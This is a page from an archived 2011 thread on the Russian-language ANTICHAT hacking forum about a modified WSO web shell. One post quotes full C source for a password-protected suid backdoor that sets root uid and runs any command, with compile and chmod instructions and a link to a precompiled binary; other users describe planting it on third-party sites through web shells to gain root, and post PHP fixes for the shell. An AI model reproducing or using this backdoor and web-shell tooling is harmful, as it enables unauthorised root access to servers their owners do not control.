HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Избранное
Перезагрузить страницу WSO 2.5 Modified
   
Ответ
Страница 3 из 11 < 1 2 3 4 5 6 7 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 29.08.2011, 23:20
Excellent18
Новичок
Регистрация: 04.06.2010
Сообщений: 0
Провел на форуме:
1263

Репутация: 0
По умолчанию
расскажите нубу, вообще для чего это добавление

что оно дает? :d
 
Ответить с цитированием

  #22  
Старый 29.08.2011, 23:26
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию
Цитата:
Сообщение от Excellent18  
Excellent18 said:
расскажите нубу, вообще для чего это добавление
что оно дает? :d
Установленный suid-бит позволяет выполнять файл от имени владельца файла, а не текущего юзера. Т.е. если дать суиднику права root'a, то можно будет выполнять команды от имени root'a с любого юзера.

Ну и следовательно модификация, чтобы более удобно использовать суидник (сохраняя графическую оболочку web-shell'a), а не просто выполнение команд.

Цитата:
Сообщение от 1NtR0  
1NtR0 said:
WSO не правильно работают на вин ОС, лучше бы это поправили.
На вин все неправильно работает
 
Ответить с цитированием

  #23  
Старый 29.08.2011, 23:28
1NtR0
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
Провел на форуме:
1122391

Репутация: 209
По умолчанию
WSO не правильно работают на вин ОС, лучше бы это поправили.
 
Ответить с цитированием

  #24  
Старый 29.08.2011, 23:31
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
Сообщение от Tigger  
Tigger said:
Код:
Code:
#include 
#include 
main(int argc, char *argv[])
{
if(argc == 3){
if(strcmp(argv[1],"cool_hack") == 0){
setgid(0);
setuid(0);
system(argv[2]);
}
}
return 0;
}
Using: ./suid cool_hack id
[path] [password] [command]
Пароль, разумеется можно изменить. В сурсе видно где
Скомпилируй (хоть на том же шелле с gcc) и используй.
Ну и, разумеется, не забывай уже бинарнику добавлять suid-бит (к примеру chmod 4751 suidfilename).
P.S.:
Скомпилированный суидник
с паролем 112s233
: http://rghost.ru/19777451
Спасибо, сейчас скомпилил, залив на ftp одного сайта(владелец user), сделал chmod 4755, зашел через вебшелл(права apache) - попробовал выполнить суидник - права показываются как апачевские.

Естественно, предварительно я посмотрел в /etc/passwd какие uid и gid у юзверя моего ftp, которые я вписал вместо рутовских нулей.

Почему так?

Цитата:
Сообщение от 1NtR0  
1NtR0 said:
WSO не правильно работают на вин ОС, лучше бы это поправили.
Что именно?
 
Ответить с цитированием

  #25  
Старый 29.08.2011, 23:38
1NtR0
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
Провел на форуме:
1122391

Репутация: 209
По умолчанию
Цитата:
Сообщение от попугай  
попугай said:
Что именно?
На вин права не правильно отображаються, а именно функция:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]wsoPermsColor[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]) {

 if (!@[/COLOR][COLOR="#0000BB"]is_readable[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]))

 return[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]wsoPerms[/COLOR][COLOR="#007700"](@[/COLOR][COLOR="#0000BB"]fileperms[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"])) .[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 elseif (!@[/COLOR][COLOR="#0000BB"]is_writable[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]))

 return[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]wsoPerms[/COLOR][COLOR="#007700"](@[/COLOR][COLOR="#0000BB"]fileperms[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"])) .[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 else

return[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]wsoPerms[/COLOR][COLOR="#007700"](@[/COLOR][COLOR="#0000BB"]fileperms[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"])) .[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

}

[/COLOR][/COLOR
Багфикс при котором работает правильно

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]wsoPermsColor[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]) {

 if([/COLOR][COLOR="#0000BB"]is_dir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"])) {

 if([/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'os'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'nix'[/COLOR][COLOR="#007700"]){

 if([/COLOR][COLOR="#0000BB"]is_writeable[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"])) {

 return[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]wsoPerms[/COLOR][COLOR="#007700"](@[/COLOR][COLOR="#0000BB"]fileperms[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"])) .[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 }elseif([/COLOR][COLOR="#0000BB"]is_readable[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"])){

 return[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]wsoPerms[/COLOR][COLOR="#007700"](@[/COLOR][COLOR="#0000BB"]fileperms[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"])) .[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 } else return[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]wsoPerms[/COLOR][COLOR="#007700"](@[/COLOR][COLOR="#0000BB"]fileperms[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"])) .[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 } else {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/.ssps_tmp'[/COLOR][COLOR="#007700"];

 if(@[/COLOR][COLOR="#0000BB"]touch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]unlink[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

 return[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]wsoPerms[/COLOR][COLOR="#007700"](@[/COLOR][COLOR="#0000BB"]fileperms[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"])) .[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 }elseif([/COLOR][COLOR="#0000BB"]opendir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]closedir[/COLOR][COLOR="#007700"]();

 return[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]wsoPerms[/COLOR][COLOR="#007700"](@[/COLOR][COLOR="#0000BB"]fileperms[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"])) .[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; }

 else return[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]wsoPerms[/COLOR][COLOR="#007700"](@[/COLOR][COLOR="#0000BB"]fileperms[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"])) .[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 }

 }

 else {

 if([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"])) return[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]wsoPerms[/COLOR][COLOR="#007700"](@[/COLOR][COLOR="#0000BB"]fileperms[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"])) .[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 elseif([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'r'[/COLOR][COLOR="#007700"])) return[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]wsoPerms[/COLOR][COLOR="#007700"](@[/COLOR][COLOR="#0000BB"]fileperms[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"])) .[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

 return[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]wsoPerms[/COLOR][COLOR="#007700"](@[/COLOR][COLOR="#0000BB"]fileperms[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"])) .[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];;

 }

}

[/COLOR][/COLOR
 
Ответить с цитированием

  #26  
Старый 31.08.2011, 00:14
Excellent18
Новичок
Регистрация: 04.06.2010
Сообщений: 0
Провел на форуме:
1263

Репутация: 0
По умолчанию
http://www.keep2.me/files/e4b18a2e046706d5e6e8c14f238b05e4/23.11.15-30.08-1278x260.jpg

вот тут у меня юзер

antidonat

а с помощью этого можно сделать другой типа и посмотреть закрытые разделы?

если не с помощью этого. то как?
 
Ответить с цитированием

  #27  
Старый 31.08.2011, 05:58
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию
Цитата:
Сообщение от Excellent18  
Excellent18 said:
http://www.keep2.me/files/e4b18a2e046706d5e6e8c14f238b05e4/23.11.15-30.08-1278x260.jpg
вот тут у меня юзер
antidonat
а с помощью этого можно сделать другой типа и посмотреть закрытые разделы?
если не с помощью этого. то как?
Если прорутать, то да.
 
Ответить с цитированием

  #28  
Старый 11.09.2011, 00:34
GizmoSB
Новичок
Регистрация: 14.02.2010
Сообщений: 8
Провел на форуме:
17377

Репутация: 0
По умолчанию
Цитата:
Сообщение от None  
Query did not return anything
не могу найти php интепритатор (( помогите плз как его найти ( freebsd 7.0
 
Ответить с цитированием

  #29  
Старый 19.09.2011, 08:29
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию
Смотрим вывод ps aux - Вообще безпалива!!1

А так в принципе норм...
 
Ответить с цитированием

  #30  
Старый 24.09.2011, 21:17
noga
Guest
Сообщений: n/a
Провел на форуме:
1665

Репутация: 0
По умолчанию
Подскажите пожалуйста. Я использую шел (из первого поста ) + этот суидник ( пост 20 ( Скомпилированный суидник с паролем 112s233: http://rghost.ru/19777451 ) )...

Но у меня не получается зайти по рутом, я почему - то захожу под 33 ( www-data ) Group: 33 ( www-data ).

Подскажите, в чём проблема?

P.S. Ввожу так:

Suid: ./suid

Password: 112s233

Php: /usr/bin/php
 
Ответить с цитированием
Ответ
Страница 3 из 11 < 1 2 3 4 5 6 7 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ